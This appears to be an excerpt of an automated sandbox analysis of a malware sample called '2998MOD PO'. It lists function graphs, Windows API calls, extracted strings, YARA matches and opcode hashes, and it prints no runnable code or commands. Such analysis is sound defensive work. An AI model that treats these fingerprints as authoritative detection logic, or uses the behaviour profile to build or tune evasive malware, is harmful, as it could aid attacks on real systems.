                          control_flow_graph 0 413d7a-413d89 1 413df9-413e04 0->1 2 413d8b-413da4 0->2 5 413e06-413e0b 1->5 6 413e6e-413e73 1->6 3 413d43-413d65 2->3 4 413da6-413db1 2->4 7 413d67-413d78 3->7 8 413d1d 3->8 11 413db3 4->11 12 413dcd-413dec 4->12 13 413e0c-413e0e 5->13 9 413e75-413e7d 6->9 10 413edb 6->10 8->3 14 413e9d-413ea3 9->14 15 413e7f-413e8e PostThreadMessageW 9->15 17 413ee9-413eec 10->17 18 413edd-413ee3 10->18 11->12 24 413df0-413df8 12->24 25 413dee 12->25 15->14 19 413e90-413e9a 15->19 20 413ee5-413ee8 18->20 21 413ebb-413ebf 18->21 19->14 21->18 23 413ec1-413ec6 21->23 23->18 26 413ec8-413ecd 23->26 24->1 25->13 25->24 26->18 27 413ecf-413ed6 26->27 27->17 29 413ed8 27->29 29->10
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 0-1999359540
                          • Opcode ID: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                          • Instruction ID: 41e09621a5d42bbcee0aa685c486dca4cf25d64e691113f71131abf1b070321e
                          • Opcode Fuzzy Hash: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                          • Instruction Fuzzy Hash: BE310F336043019FC710CE68ACC69EAB769EF85B1570445ABE144CF3A2E2298F83C788
                          Function 00413E0F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 1836367815-1999359540
                          • Opcode ID: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                          • Instruction ID: 62f55432ef48320368bfc7655e925e1af4bb88519bc3667248631d0393ebb683
                          • Opcode Fuzzy Hash: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                          • Instruction Fuzzy Hash: 5C012671D0021C7AEB11ABE58C82DEF7B7CDF413A8F048169FA14AB241D67D4E068BB1
                          Function 00413E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 44 413e13-413e25 45 413e2d-413e7d call 42f023 call 417563 call 404683 call 424c83 44->45 46 413e28 call 42e613 44->46 55 413e9d-413ea3 45->55 56 413e7f-413e8e PostThreadMessageW 45->56 46->45 56->55 57 413e90-413e9a 56->57 57->55
                          APIs
                          • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: Ea64OHKq$Ea64OHKq
                          • API String ID: 1836367815-1999359540
                          • Opcode ID: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                          • Instruction ID: 832b8f0f82de43865680b143cd41517b910a90eb7c2e8913e91f4129158ae345
                          • Opcode Fuzzy Hash: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                          • Instruction Fuzzy Hash: 10012671D0021C7AEB11AAE18C81DEF7B7CDF40398F048029FA0467241D57D4E058BB5
                          Function 0041760F Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 193 41760f-417610 194 417612-417623 193->194 195 41759b-4175a0 193->195 196 4175b0-4175c1 call 42dbc3 195->196 197 4175a2-4175ad call 42f9f3 195->197 202 4175c3-4175d0 196->202 203 4175da-4175dd 196->203 197->196 204 4175d1-4175d7 LdrLoadDll 202->204 204->203
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                          • Instruction ID: 244a9be35222bc483ccb875c85ee509224bce84f5c57bb6526cc21583e77dac4
                          • Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                          • Instruction Fuzzy Hash: 81F062B1E04109BADF10DBA0DC91FDEB775AF14705F444266E80497641F635E7888795
                          Function 00417624 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 417624-417632 206 4175d1-4175d7 LdrLoadDll 205->206 207 417634-417671 205->207 208 4175da-4175dd 206->208
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                          • Instruction ID: 3da201fd3e5f4a38d3ab40cb9ffbd160d6eadf765e117ee62af733f6e3875303
                          • Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                          • Instruction Fuzzy Hash: BDF09E39699B086BC3118BB998057C9B7E4FF42900F294198DDC9C6E53E363821AC781
                          Function 0042C763 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 42c763-42c7a7 call 404713 call 42d6b3 RtlAllocateHeap
                          APIs
                          • RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                          • Instruction ID: 8478ad7e8697ef7acc63e2c8c0b0e70c508952faf178b19bb78cdc86ac20e0b7
                          • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                          • Instruction Fuzzy Hash: 18E06DB27042047FD610EE59EC45F9B73ACEFC5714F004019F908A7282D770B9108AB5
                          Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 214 42c7b3-42c7f4 call 404713 call 42d6b3 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                          • Instruction ID: 0103aceadb78e79b7ecc8faacede7f1e09fa23b9d57152ecbc1c1368217fcbeb
                          • Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                          • Instruction Fuzzy Hash: 6DE06DB17002047BD610EE59EC81F9B33ADDFC5710F004019FE08A7241D671B9108AB9
                          Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 224 42c803-42c83c call 404713 call 42d6b3 ExitProcess
                          APIs
                          • ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837
                          Memory Dump Source
                          • Source File: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_2998MOD PO.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                          • Instruction ID: f8c1995de4c57a0dc7d95be7e0574ee260bed641c46f1d5501e4473e89b5d8ab
                          • Opcode Fuzzy Hash: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                          • Instruction Fuzzy Hash: F9E04F756442147FD120BA9ADC41F97776CDFC5714F40401AFA1C67241C674790487F4
                          Function 019C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 229 19c2c0a-19c2c0f 230 19c2c1f-19c2c26 LdrInitializeThunk 229->230 231 19c2c11-19c2c18 229->231
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                          • Instruction ID: b6b13b121cc887ce72d467063fbec4da23604204b3673ea1207d1273ab7e5eb0
                          • Opcode Fuzzy Hash: b2795b8a0a16adcacce1c9de65cec938b79d36d2c3e50573e4e67d5fce2166fc
                          • Instruction Fuzzy Hash: 33B09B71D415D5C5DA11E764460C717795477D0701F15C065D2470641F4738C1D1E277

                          Non-executed Functions

                          Function 01A02349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332
                          • Opcode ID: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                          • Instruction ID: 37d749f5caca1e2b47d3fcccef930c75c7e82d275f672e853a29d513f2c50aed
                          • Opcode Fuzzy Hash: d32edf0c789a39f536192ccd4418bc6b7481a18f2f965b355670652ee0657403
                          • Instruction Fuzzy Hash: 83929371604742AFE722CF18D884B6BB7E8BF84750F04492EFA98D7291D770E944CB92
                          Function 019B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                          Download Yara Rule
                          Strings
                          • Critical section address, xrefs: 019F5425, 019F54BC, 019F5534
                          • Critical section address., xrefs: 019F5502
                          • Critical section debug info address, xrefs: 019F541F, 019F552E
                          • corrupted critical section, xrefs: 019F54C2
                          • 8, xrefs: 019F52E3
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F54CE
                          • Address of the debug info found in the active list., xrefs: 019F54AE, 019F54FA
                          • Invalid debug info address of this critical section, xrefs: 019F54B6
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F54E2
                          • double initialized or corrupted critical section, xrefs: 019F5508
                          • Thread identifier, xrefs: 019F553A
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019F540A, 019F5496, 019F5519
                          • Thread is in a state in which it cannot own a critical section, xrefs: 019F5543
                          • undeleted critical section in freed memory, xrefs: 019F542B
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: 012eb136ea4c6fbcbb23cf99b1a66e6afa765118bbe1f27ed00b4375cf336b03
                          • Instruction ID: 7274dc9c11a1acd752ceb46e078bd0cfb8f6570b86728fe850456f77672520cf
                          • Opcode Fuzzy Hash: 012eb136ea4c6fbcbb23cf99b1a66e6afa765118bbe1f27ed00b4375cf336b03
                          • Instruction Fuzzy Hash: 24816CB1A40348EFEB20CF99C945FAEBBB9BB48B14F11415DE608B7641D3B1A941CB60
                          Function 019B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                          Download Yara Rule
                          Strings
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019F2506
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019F2409
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019F22E4
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019F24C0
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019F25EB
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019F2498
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019F2602
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 019F261F
                          • @, xrefs: 019F259B
                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019F2624
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019F2412
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          • Opcode ID: d3c6f0843c299f01fddce65fbd03a2408cf78dc5711f971662b34df57878d565
                          • Instruction ID: 364992b69eb9185764814df1bce43806985bf5ee91b2a315883ebb3aeed14720
                          • Opcode Fuzzy Hash: d3c6f0843c299f01fddce65fbd03a2408cf78dc5711f971662b34df57878d565
                          • Instruction Fuzzy Hash: 50026FF1D04229ABDB31DB54CD80BD9B7B8EB54704F4045EAA70DA7241EB70AE84CF69
                          Function 01A28B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          • Opcode ID: 14cbc5ec21a771b1293662917c6c8acb48094b38d3c7304ed5be7e68a95e887c
                          • Instruction ID: 89f05b562c982c835ddf52eb93758a7443dfed817d88dc5a79b04fb3d3f33446
                          • Opcode Fuzzy Hash: 14cbc5ec21a771b1293662917c6c8acb48094b38d3c7304ed5be7e68a95e887c
                          • Instruction Fuzzy Hash: 9751BD715043219BC729DF5CC884BABBBE8EFD4650F54492DFA99C3241E778D608CB92
                          Function 01A30274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 0-1700792311
                          • Opcode ID: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                          • Instruction ID: 05e6bdf080efa810055a6d9e8321e5f12c5d40de61d60792208343e0a1fff95f
                          • Opcode Fuzzy Hash: 8d66dd0a9875a3cce8f874eadf886b33bb27b709035a887e8247c586bf838877
                          • Instruction Fuzzy Hash: 91D1DE36600686DFDB22DF68C940BAEBBF1FFC9714F188059F48A9B252C7349A41CB54
                          Function 01A089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                          Download Yara Rule
                          Strings
                          • AVRF: -*- final list of providers -*- , xrefs: 01A08B8F
                          • HandleTraces, xrefs: 01A08C8F
                          • VerifierDlls, xrefs: 01A08CBD
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A08A3D
                          • VerifierFlags, xrefs: 01A08C50
                          • VerifierDebug, xrefs: 01A08CA5
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A08A67
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 6bac0ab5fe5147dc4af8e98667a53ebc0353f083a5a547f8c0c10cfeb365439d
                          • Instruction ID: ea4ec48ab5ce28d39c6e402ace289ff2e26b0154d2cf950491fbed341f4b7856
                          • Opcode Fuzzy Hash: 6bac0ab5fe5147dc4af8e98667a53ebc0353f083a5a547f8c0c10cfeb365439d
                          • Instruction Fuzzy Hash: 48912571E01712AFD723EF68EC80B6B77B8AF94714F050518FA496B281C738AD05CB99
                          Function 0198EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                          • API String ID: 0-1109411897
                          • Opcode ID: d17794a1372e6af01c2ad02604847a479690b87928bbaabc72ae25ed9acdd597
                          • Instruction ID: 5f06398c78399f5350eaf14990483944362d5b18df2bc77b1fc66cc4ceaa7a61
                          • Opcode Fuzzy Hash: d17794a1372e6af01c2ad02604847a479690b87928bbaabc72ae25ed9acdd597
                          • Instruction Fuzzy Hash: 76A25974A0562A8FDB65EF18CD98BA9BBF5BF45704F1442E9D90DA7290DB309E81CF00
                          Function 019B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          • Opcode ID: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                          • Instruction ID: 0dceb77e734a829f4e04c83add54a97900ded4322b0398d0e1aabbf7c15416d4
                          • Opcode Fuzzy Hash: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
                          • Instruction Fuzzy Hash: E5916D35B01715ABEB35DF18DD84FEA7BAABF90B25F04012CD60C6B281D778A902C791
                          Function 0197645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019D9A11, 019D9A3A
                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 019D9A01
                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019D9A2A
                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019D99ED
                          • LdrpInitShimEngine, xrefs: 019D99F4, 019D9A07, 019D9A30
                          • apphelp.dll, xrefs: 01976496
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-204845295
                          • Opcode ID: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                          • Instruction ID: 6a928f8522de30c1ef636d3fe7b2a93600abd8dd765eb095c6051616943fdd3b
                          • Opcode Fuzzy Hash: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
                          • Instruction Fuzzy Hash: 785190726087059BE721EF24C891FABB7E8EFC4648F01491DE58D9B1A0D630EA05CB93
                          Function 019BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrredirect.c, xrefs: 019F8181, 019F81F5
                          • Loading import redirection DLL: '%wZ', xrefs: 019F8170
                          • LdrpInitializeImportRedirection, xrefs: 019F8177, 019F81EB
                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 019F81E5
                          • minkernel\ntdll\ldrinit.c, xrefs: 019BC6C3
                          • LdrpInitializeProcess, xrefs: 019BC6C4
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-475462383
                          • Opcode ID: 49d2d2c9b4c04e924df0415a82ce8e4a6a522f6e09463e563dfad1665e89059d
                          • Instruction ID: c0ff38794e8368bd11d1389d4490447fca3c0a7789a44ab4e6efdbb3b45b3c78
                          • Opcode Fuzzy Hash: 49d2d2c9b4c04e924df0415a82ce8e4a6a522f6e09463e563dfad1665e89059d
                          • Instruction Fuzzy Hash: E631F571744706ABD214EF28DD86E6A7798FFD4B10F05051CF94CAB291E620ED05C7A2
                          Function 019B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                          Download Yara Rule
                          Strings
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019F2180
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019F219F
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019F21BF
                          • RtlGetAssemblyStorageRoot, xrefs: 019F2160, 019F219A, 019F21BA
                          • SXS: %s() passed the empty activation context, xrefs: 019F2165
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019F2178
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                          • API String ID: 0-861424205
                          • Opcode ID: 8543d281e34cb3e2c25b2d2ff305da65cf9c23b932c1220fdf533db60293a622
                          • Instruction ID: 762c0a9e5985756d08dbadae7cfbd3b9ceca91e67c0c6174dec066392d3b2fca
                          • Opcode Fuzzy Hash: 8543d281e34cb3e2c25b2d2ff305da65cf9c23b932c1220fdf533db60293a622
                          • Instruction Fuzzy Hash: 3431E23AB402157BE7218BDA8DC5FAA7B6CEBA5A54F05005DBB0CB7240D270FE01C7A5
                          Function 019C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 019C2DF0: LdrInitializeThunk.NTDLL ref: 019C2DFA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0BA3
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0BB6
